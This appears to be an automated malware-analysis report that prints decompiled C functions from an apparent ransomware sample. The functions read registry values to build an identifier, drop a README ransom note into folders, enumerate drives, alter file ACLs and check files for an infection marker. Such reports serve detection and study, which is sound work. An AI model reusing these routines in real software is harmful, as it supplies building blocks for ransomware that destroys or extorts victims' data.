Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(DEADBEEF,?,00000000), ref: 00CE1E3D
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E4A
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E59
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E69
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E79

FindCloseChangeNotification.KERNEL32(000000FF,?,?,?,?,00000000), ref: 00CE4026

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputeCrc32$File$Heap$AllocateChangeCloseCreateFindFreeModuleNameNotificationReadSize
String ID:
API String ID: 1295045732-0
Opcode ID: 4b943cb8e0c1df0ebbd23161c9a6cd5423dd112094e3e7349ed752837452b1b6
Instruction ID: ffaeda96fa0c2840eced0b5e7b659acc4206c51e85b08451c280a89e92090975
Opcode Fuzzy Hash: 4b943cb8e0c1df0ebbd23161c9a6cd5423dd112094e3e7349ed752837452b1b6
Instruction Fuzzy Hash: F921D832640204BBE731ABA2DC0EFBF7B3DEB45B61F240024BA04A20E2D7716E10D665

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3A92, Relevance: 9.1, APIs: 6, Instructions: 90
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3A92(short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char _v80;
				short _v208;
				long _t16;
				long _t22;
				void* _t32;
				void* _t36;
				void* _t37;

				_t37 = E00CE1AEC(0xceb80e);
				_t16 = RegOpenKeyExW(0x80000002, _t37, 0, 0x101,  &_v8); // executed
				if(_t16 == 0) {
					_v12 = 1;
					_v16 = 0x80;
					_t36 = E00CE1AEC(0xceb852);
					_t22 = RegQueryValueExW(_v8, _t36, 0,  &_v12,  &_v208,  &_v16); // executed
					if(_t22 == 0) {
						_t32 = E00CE1E10(E00CE1E10(E00CE1E10(E00CE1E10( &_v80, WideCharToMultiByte(0, 0,  &_v208, 0xffffffff,  &_v80, 0x40, 0, 0), 0), 0x10, 1), 0x10, 1), 0x10, 1);
						_t34 = _a4;
						 *_a4 = 0x2e;
						E00CE151D(_t32, 4, _t34 + 2);
					}
					RtlFreeHeap( *0xcf0a9e, 0, _t36);
					RegCloseKey(_v8);
				}
				return RtlFreeHeap( *0xcf0a9e, 0, _t37);
			}

0x00ce3aaa
0x00ce3abd
0x00ce3ac5
0x00ce3acb
0x00ce3ad2
0x00ce3ae3
0x00ce3afa
0x00ce3b02
0x00ce3b46
0x00ce3b4b
0x00ce3b4e
0x00ce3b5a
0x00ce3b5a
0x00ce3b68
0x00ce3b71
0x00ce3b71
0x00ce3b8e

APIs

Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,00000010,00CEB80E), ref: 00CE3ABD
RegQueryValueExW.KERNEL32(00000010,00000000,00000000,00000001,?,00000080,00CEB852), ref: 00CE3AFA
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000040,00000000,00000000), ref: 00CE3B1B

Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(DEADBEEF,?,00000000), ref: 00CE1E3D
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E4A
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E59
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E69
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E79

RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3B68
RegCloseKey.ADVAPI32(00000010), ref: 00CE3B71
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3B80

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputeCrc32$Heap$Free$AllocateByteCharCloseMultiOpenQueryValueWide
String ID:
API String ID: 3484896912-0
Opcode ID: 77cbdbfa08a2594d78bdbc3ece497217571a7f5380b3831c0516805221cfea49
Instruction ID: 5777e524cb6a32f2d29a9854a386ce7c0083bfe72fec49bf0b0a33305cd53cb6
Opcode Fuzzy Hash: 77cbdbfa08a2594d78bdbc3ece497217571a7f5380b3831c0516805221cfea49
Instruction Fuzzy Hash: 84219572740248BAFB20ABD1DC4AFFF7B6DDB04B50F200115FB04AA0D2D6B16960D765

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2DBE, Relevance: 9.1, APIs: 6, Instructions: 63
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE2DBE(wchar_t* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				long _v536;
				long _t14;
				long _t21;
				int _t26;
				void* _t27;
				void* _t28;

				_t26 = 0;
				_t28 = E00CE1AEC(0xceb794);
				_t14 = RegOpenKeyExW(0x80000002, _t28, 0, 0x101,  &_v8); // executed
				if(_t14 == 0) {
					_v12 = 1;
					_v16 = 0x208;
					_t27 = E00CE1AEC(0xceb7f2);
					_t21 = RegQueryValueExW(_v8, _t27, 0,  &_v12,  &_v536,  &_v16); // executed
					if(_t21 == 0) {
						wcscpy(_a4,  &_v536);
						_t26 = _v16;
					}
					RtlFreeHeap( *0xcf0a9e, 0, _t27);
					RegCloseKey(_v8); // executed
				}
				RtlFreeHeap( *0xcf0a9e, 0, _t28);
				return _t26;
			}

0x00ce2dcc
0x00ce2dd8
0x00ce2deb
0x00ce2df3
0x00ce2df5
0x00ce2dfc
0x00ce2e0d
0x00ce2e24
0x00ce2e2c
0x00ce2e38
0x00ce2e41
0x00ce2e41
0x00ce2e4d
0x00ce2e56
0x00ce2e56
0x00ce2e65
0x00ce2e75

APIs

Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,00000000,00CEB794,?,?,?,?,00000000), ref: 00CE2DEB
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000001,?,00000208,00CEB7F2,?,?,?,?,00000000), ref: 00CE2E24
wcscpy.NTDLL ref: 00CE2E38
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE2E4D
RegCloseKey.KERNEL32(00000000,?,?,?,?,00000000), ref: 00CE2E56
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE2E65

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$AllocateCloseOpenQueryValuewcscpy
String ID:
API String ID: 1373304816-0
Opcode ID: 1415aff9a228d12ca9404e2fab8805bbeb1696e7d403db53a2e6ea6b0fe4026b
Instruction ID: 6aeef30860719d36b9c83535c517e3d40d86b7c78a5798974f807fb151b1fe4e
Opcode Fuzzy Hash: 1415aff9a228d12ca9404e2fab8805bbeb1696e7d403db53a2e6ea6b0fe4026b
Instruction Fuzzy Hash: DB118F32640208BFEB10AB92DC4AFFF7B7DEB44B41F200065FA04A1062D6716E54DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2F62, Relevance: 9.1, APIs: 6, Instructions: 63
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE2F62(wchar_t* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				long _v536;
				long _t14;
				long _t21;
				int _t26;
				void* _t27;
				void* _t28;

				_t26 = 0;
				_t28 = E00CE1AEC(0xcebbe6);
				_t14 = RegOpenKeyExW(0x80000001, _t28, 0, 0x101,  &_v8); // executed
				if(_t14 == 0) {
					_v12 = 1;
					_v16 = 0x208;
					_t27 = E00CE1AEC(0xcebc2a);
					_t21 = RegQueryValueExW(_v8, _t27, 0,  &_v12,  &_v536,  &_v16); // executed
					if(_t21 == 0) {
						wcscpy(_a4,  &_v536);
						_t26 = _v16;
					}
					RtlFreeHeap( *0xcf0a9e, 0, _t27);
					RegCloseKey(_v8); // executed
				}
				RtlFreeHeap( *0xcf0a9e, 0, _t28);
				return _t26;
			}

0x00ce2f70
0x00ce2f7c
0x00ce2f8f
0x00ce2f97
0x00ce2f99
0x00ce2fa0
0x00ce2fb1
0x00ce2fc8
0x00ce2fd0
0x00ce2fdc
0x00ce2fe5
0x00ce2fe5
0x00ce2ff1
0x00ce2ffa
0x00ce2ffa
0x00ce3009
0x00ce3019

APIs

Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00000101,00000000,00CEBBE6,?,?,?,?,00000000), ref: 00CE2F8F
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000001,?,00000208,00CEBC2A,?,?,?,?,00000000), ref: 00CE2FC8
wcscpy.NTDLL ref: 00CE2FDC
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE2FF1
RegCloseKey.KERNEL32(00000000,?,?,?,?,00000000), ref: 00CE2FFA
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3009

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$AllocateCloseOpenQueryValuewcscpy
String ID:
API String ID: 1373304816-0
Opcode ID: ee2fd69a87d53728d45cfc79925bb48a2819f07ba46efa396f9009cac5d704c5
Instruction ID: ae57fa2635d6031beb1bc161e0010b504d228e55b4b7a1382acd065ea63fb211
Opcode Fuzzy Hash: ee2fd69a87d53728d45cfc79925bb48a2819f07ba46efa396f9009cac5d704c5
Instruction Fuzzy Hash: 3B114F32640108BFEB10ABD2DC49FFF7B7DEB44B50F200165FA04A5062D6726A54DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3BD8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3BD8(WCHAR* _a4, char* _a8) {
				short _v524;
				int _t12;

				GetCurrentDirectoryW(0x104,  &_v524);
				SetCurrentDirectoryW(_a4); // executed
				E00CE1D9E("README.418990b0.TXT", _a8, strlen(_a8)); // executed
				_t12 = SetCurrentDirectoryW( &_v524); // executed
				return _t12;
			}

0x00ce3bf2
0x00ce3bfb
0x00ce3c16
0x00ce3c22
0x00ce3c30

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000000,?,?,?), ref: 00CE3BF2
SetCurrentDirectoryW.KERNEL32(00000000,?,?,?), ref: 00CE3BFB
strlen.NTDLL ref: 00CE3C04

Part of subcall function 00CE1D9E: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00CE1DBE
Part of subcall function 00CE1D9E: WriteFile.KERNEL32(000000FF,?,00CE3C1B,00000000,00000000,?,?,?), ref: 00CE1DDC
Part of subcall function 00CE1D9E: FindCloseChangeNotification.KERNEL32(000000FF,?,?,?), ref: 00CE1DE9

SetCurrentDirectoryW.KERNEL32(?,README.418990b0.TXT,00000000,00000000,?), ref: 00CE3C22

Strings

README.418990b0.TXT, xrefs: 00CE3C11

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$File$ChangeCloseCreateFindNotificationWritestrlen
String ID: README.418990b0.TXT
API String ID: 261485375-3504603320
Opcode ID: 29752ef3a20423141243c29f737d3469ece56b6e34441f1debd6f20bd0a84152
Instruction ID: 9102cfce88fff8f446778b8821d412c124541e9d9c1b39170682e99681629ddd
Opcode Fuzzy Hash: 29752ef3a20423141243c29f737d3469ece56b6e34441f1debd6f20bd0a84152
Instruction Fuzzy Hash: 1EF0377650020CBFD710AF95FC0DEFF7B6CDB48711F104265FA5580062DA719954DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CE611A, Relevance: 7.6, APIs: 5, Instructions: 92
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE611A(WCHAR* _a4) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				void _v160;
				int _t20;
				void* _t21;
				int _t24;
				int _t27;
				int _t34;

				_v8 = 0;
				_t20 = SetFileAttributesW(_a4, 0x80); // executed
				if(_t20 != 0) {
					while(1) {
						_t21 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0x80, 0); // executed
						_v12 = _t21;
						__eflags = _v12 - 0xffffffff;
						if(_v12 != 0xffffffff) {
							break;
						}
						__eflags =  *0xcf07e1;
						if( *0xcf07e1 == 0) {
							L7:
							_v8 = 0xffffffff;
							goto L17;
						}
						__eflags =  *[fs:0x34] - 0x20;
						if( *[fs:0x34] != 0x20) {
							goto L7;
						}
						_t34 = E00CE57E5(_a4);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L7;
						}
					}
					asm("sbb edx, 0x0");
					_push(2);
					_t24 = SetFilePointerEx(_v12, 0xffffffffffffff70, 0, 0);
					__eflags = _t24;
					if(_t24 != 0) {
						_t27 = ReadFile(_v12,  &_v160, 0x90,  &_v16, 0);
						__eflags = _t27;
						if(_t27 != 0) {
							E00CE1E10( &_v160, 0x80, 0);
							asm("repe cmpsb");
							if(__eflags == 0) {
								_v8 = 1;
							}
						} else {
							_v8 =  *[fs:0x34];
						}
					} else {
						__eflags =  *[fs:0x34] - 0x83;
						if( *[fs:0x34] != 0x83) {
							_v8 =  *[fs:0x34];
						}
					}
					CloseHandle(_v12);
					goto L17;
				} else {
					_v8 =  *[fs:0x34];
					L17:
					return _v8;
				}
			}

0x00ce6128
0x00ce6137
0x00ce613f
0x00ce614f
0x00ce6164
0x00ce616a
0x00ce616d
0x00ce6171
0x00000000
0x00000000
0x00ce6173
0x00ce617a
0x00ce6194
0x00ce6194
0x00000000
0x00ce6194
0x00ce617c
0x00ce6184
0x00000000
0x00000000
0x00ce6189
0x00ce618e
0x00ce6190
0x00000000
0x00000000
0x00ce6192
0x00ce61a9
0x00ce61ac
0x00ce61b5
0x00ce61bb
0x00ce61bd
0x00ce61ec
0x00ce61f2
0x00ce61f4
0x00ce6211
0x00ce6223
0x00ce6225
0x00ce6227
0x00ce6227
0x00ce61f6
0x00ce61fc
0x00ce61fc
0x00ce61bf
0x00ce61bf
0x00ce61ca
0x00ce61d2
0x00ce61d2
0x00ce61d5
0x00ce6231
0x00000000
0x00ce6141
0x00ce6147
0x00ce6237
0x00ce6242
0x00ce6242

APIs

SetFileAttributesW.KERNEL32(00CE62E9,00000080,00000000,00000000,?,?,?), ref: 00CE6137
CreateFileW.KERNEL32(00CE62E9,C0000000,00000000,00000000,00000003,00000080,00000000,?,?,?), ref: 00CE6164

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6dfe435e4d9d3e1645e663f074560feee759a75c1e3a75b64acd9a1283fb3d27
Instruction ID: ae689c61a5237b51012fa9796f3ba3afde043fc13abf26b8dea985dbb86910f5
Opcode Fuzzy Hash: 6dfe435e4d9d3e1645e663f074560feee759a75c1e3a75b64acd9a1283fb3d27
Instruction Fuzzy Hash: E331C071A51288FFEF21CFA2DD05BAD7BB8EB10B80F208165FA11AA1D1D7746B04DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5A9C, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetNamedSecurityInfoW.ADVAPI32(00CE6841,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00CE5ABA
SetEntriesInAclW.ADVAPI32(00000001,00CF0790,00000000,00CE6841,?,?,?), ref: 00CE5AD2
SetNamedSecurityInfoW.ADVAPI32(00CE6841,00000001,00000005,00CF0784,00000000,00CE6841,00000000,?,?,?), ref: 00CE5AEF
RtlFreeHeap.NTDLL(00000000,00CE6841), ref: 00CE5B00

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoNamedSecurity$EntriesFreeHeap
String ID:
API String ID: 2009802112-0
Opcode ID: 670efe2775b7aa47729cc35730dac23379d9060ded32f92c5a430ec58953ff74
Instruction ID: 808a9e417900885516a1d2379d4b55fd3b99df0f7ab3607440870e32cc426484
Opcode Fuzzy Hash: 670efe2775b7aa47729cc35730dac23379d9060ded32f92c5a430ec58953ff74
Instruction Fuzzy Hash: A8011D31780308BEEB209B919C4AFAE7B69EB44F55F200161B714A80E1E6F26A50DA59

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1D9E, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE1D9E(WCHAR* _a4, void* _a8, long _a12) {
				void* _v8;
				long _v12;
				int _t10;
				int _t13;

				_t10 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v8 = _t10;
				if(_v8 != 0xffffffff) {
					_t10 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
					if(_t10 != 0) {
						_t13 = FindCloseChangeNotification(_v8); // executed
						return _t13;
					}
					if( *[fs:0x34] == 0x70) {
						return CloseHandle(_v8);
					}
				}
				return _t10;
			}

0x00ce1dbe
0x00ce1dc4
0x00ce1dcb
0x00ce1ddc
0x00ce1de4
0x00ce1de9
0x00000000
0x00ce1de9
0x00ce1df9
0x00000000
0x00ce1dfe
0x00ce1df9
0x00ce1e0c

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00CE1DBE
WriteFile.KERNEL32(000000FF,?,00CE3C1B,00000000,00000000,?,?,?), ref: 00CE1DDC
FindCloseChangeNotification.KERNEL32(000000FF,?,?,?), ref: 00CE1DE9
CloseHandle.KERNEL32(000000FF,?,?,?), ref: 00CE1DFE

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFile$ChangeCreateFindHandleNotificationWrite
String ID:
API String ID: 2570977422-0
Opcode ID: becdaa91becef61c38c9557a6c358f15076f2175d9b130dbb40f72c6062c6e8d
Instruction ID: d7ca01d7e3592277ef2b35f385ac419394316f199f3b41dfb24f0ec90dd3af0c
Opcode Fuzzy Hash: becdaa91becef61c38c9557a6c358f15076f2175d9b130dbb40f72c6062c6e8d
Instruction Fuzzy Hash: A6016D31640208FFEB218B95DD0AFAEBB38EB40B22F244125FA10A50E0D7712F20EA55

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6DB9, Relevance: 4.5, APIs: 3, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE6DB9() {
				char _v36;
				short _v292;
				int _t7;
				unsigned int _t10;
				unsigned int _t11;
				WCHAR* _t12;
				wchar_t* _t13;
				void* _t14;

				_t7 = GetLogicalDriveStringsW(0x80,  &_v292); // executed
				_t10 = _t7;
				if(_t10 != 0) {
					_t13 =  &_v292;
					_t11 = _t10 >> 2;
					do {
						_t7 = GetDriveTypeW(_t13);
						if(_t7 == 3 || _t7 == 2 || _t7 == 4) {
							_t12 =  &_v36;
							 *_t12 = 0x5c005c;
							 *((intOrPtr*)(_t12 + 4)) = 0x5c003f;
							wcscpy(_t12 + 8, _t13);
							_t14 = _t14 + 8;
							_t7 = E00CE6B07(_t12); // executed
						}
						_t13 =  &(_t13[2]);
						_t11 = _t11 - 1;
					} while (_t11 != 0);
				}
				return _t7;
			}

0x00ce6dd3
0x00ce6dd9
0x00ce6ddd
0x00ce6ddf
0x00ce6de5
0x00ce6de8
0x00ce6de9
0x00ce6df2
0x00ce6dfe
0x00ce6e01
0x00ce6e07
0x00ce6e13
0x00ce6e19
0x00ce6e1d
0x00ce6e1d
0x00ce6e22
0x00ce6e25
0x00ce6e26
0x00ce6de8
0x00ce6e32

APIs

GetLogicalDriveStringsW.KERNEL32(00000080,?,?,?,?,?,00000000), ref: 00CE6DD3
GetDriveTypeW.KERNEL32(?,?,?,?,?,00000000), ref: 00CE6DE9
wcscpy.NTDLL ref: 00CE6E13

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Drive$LogicalStringsTypewcscpy
String ID:
API String ID: 2407912034-0
Opcode ID: 80ddbc5ab2ca1bdfd68a5a00a2731d9a408dbcc31b01839e8799dda54640a05d
Instruction ID: 347c3083b1b3f9c980ef307b8a81ddd68ddae1bcc40eae94e5cf428b26547089
Opcode Fuzzy Hash: 80ddbc5ab2ca1bdfd68a5a00a2731d9a408dbcc31b01839e8799dda54640a05d
Instruction Fuzzy Hash: 48F02D76601215AFD72197C5AC89FFE7B6CFF55341F500135ED14E2141D731AE24C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2D3E, Relevance: 4.5, APIs: 3, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CE2D3E(wchar_t* _a4) {
				char _v8;
				wchar_t* _v12;
				signed int _t11;

				 *0xcf0f4a(0,  &_v12,  &_v8); // executed
				wcscpy(_a4, _v12);
				_t11 = wcslen(_a4);
				RtlFreeHeap( *0xcf0a9e, 0, _v12);
				return _t11 << 1;
			}

0x00ce2d53
0x00ce2d5f
0x00ce2d6b
0x00ce2d83
0x00ce2d93

APIs

wcscpy.NTDLL ref: 00CE2D5F
wcslen.NTDLL ref: 00CE2D6B
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE2D83

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapwcscpywcslen
String ID:
API String ID: 3344585221-0
Opcode ID: dda8ae68b7e1ffb14247a0a90526721412cde5d39aae7b347b5fd5ee040d80ae
Instruction ID: bfc83310623ca4a6ce939890882a2e9917267fcad4391b6a02fb1666a931939f
Opcode Fuzzy Hash: dda8ae68b7e1ffb14247a0a90526721412cde5d39aae7b347b5fd5ee040d80ae
Instruction Fuzzy Hash: 9CF05476604108BFDB005BD4FC45FEE7F79EB44752F200271FA05911A1DA325A64DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CE80A9, Relevance: 4.5, APIs: 3, Instructions: 26
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE80A9() {
				void* _t8;
				void* _t10;
				void* _t19;

				if( *0xcf07f5 == 0) {
					L6:
					E00CE72C0(_t19); // executed
					CloseHandle(_t10);
				} else {
					E00CE3F60(0xceae74); // executed
					if(OpenMutexW(0x100000, 0, 0xceae74) == 0) {
						_t8 = CreateMutexW(0, 1, 0xceae74); // executed
						_t10 = _t8;
						E00CE13DA(_t8, 0xceae74,  *0xceae70); // executed
						goto L6;
					} else {
					}
				}
				if( *0xcf092c != 0) {
					CloseHandle( *0xcf092c);
				}
				if( *0xcf07e7 != 0) {
					E00CE7D5B();
				}
				return CloseHandle( *0xcf0aa6);
			}

0x00ce812f
0x00ce8176
0x00ce8176
0x00ce817c
0x00ce8131
0x00ce8136
0x00ce8151
0x00ce815e
0x00ce8164
0x00ce8171
0x00000000
0x00000000
0x00ce8153
0x00ce8151
0x00ce8189
0x00ce8191
0x00ce8191
0x00ce819e
0x00ce81a0
0x00ce81a0
0x00ce81b4

APIs

